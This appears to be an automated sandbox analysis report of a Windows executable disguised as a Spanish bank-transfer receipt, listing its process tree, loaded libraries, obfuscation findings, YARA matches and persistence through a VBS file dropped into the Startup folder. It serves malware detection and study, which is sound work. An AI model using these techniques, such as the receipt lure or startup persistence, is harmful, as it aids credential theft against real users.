                    Source: Comprobante transferencia 5678373888272653688262553.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Comprobante transferencia 5678373888272653688262553.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: LoginData.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Comprobante transferencia 5678373888272653688262553.exeVirustotal: Detection: 34%
                    Source: Comprobante transferencia 5678373888272653688262553.exeReversingLabs: Detection: 35%
                    Source: Comprobante transferencia 5678373888272653688262553.exeString found in binary or memory: hlp-application/x-helpfile
                    Source: Comprobante transferencia 5678373888272653688262553.exeString found in binary or memory: aoskapplication/x-nokia-9000-communicator-add-on-software
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeFile read: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe "C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe"
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsClosed.exe "C:\Users\user\AppData\Roaming\IsClosed.exe"
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsClosed.exe "C:\Users\user\AppData\Roaming\IsClosed.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msvbvm60.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vb6zz.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsqlite3.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Comprobante transferencia 5678373888272653688262553.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Comprobante transferencia 5678373888272653688262553.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: Comprobante transferencia 5678373888272653688262553.exeStatic file information: File size 2084352 > 1048576
                    Source: Comprobante transferencia 5678373888272653688262553.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1fc400
                    Source: Comprobante transferencia 5678373888272653688262553.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118805841.00000000068A0000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003A02000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: W.pdb4 source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2221804401.0000000000751000.00000004.00000400.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118805841.00000000068A0000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003A02000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.4170c88.4.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.4170c88.4.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.4170c88.4.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.4170c88.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.4170c88.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.6700000.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.6700000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.4096648.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.4096648.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3ce3020.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c41788.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c3d9c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2090939466.000000000288D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2118219479.0000000006700000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2225348365.000000000290E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Comprobante transferencia 5678373888272653688262553.exe PID: 4956, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: IsClosed.exe PID: 7120, type: MEMORYSTR
                    Source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.62f0000.8.raw.unpack, bfRM8NkZJ0xIbVmvBJ9.csHigh entropy of concatenated method names: 'sj6kS1P8dG', 's3YkaY0FXG', 'hBokXS2YEw', 'A68kTULqao', 'xFvkrycmoC', 'Yf7k3rAukt', 'uYLkqIFW1u', 'rfGkxY5HUT', 'YXckNELN8d', 'EnjkFSupR6'
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeFile created: C:\Users\user\AppData\Roaming\IsClosed.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops VBS files to the startup folder
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbsJump to dropped file
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbsJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbsJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
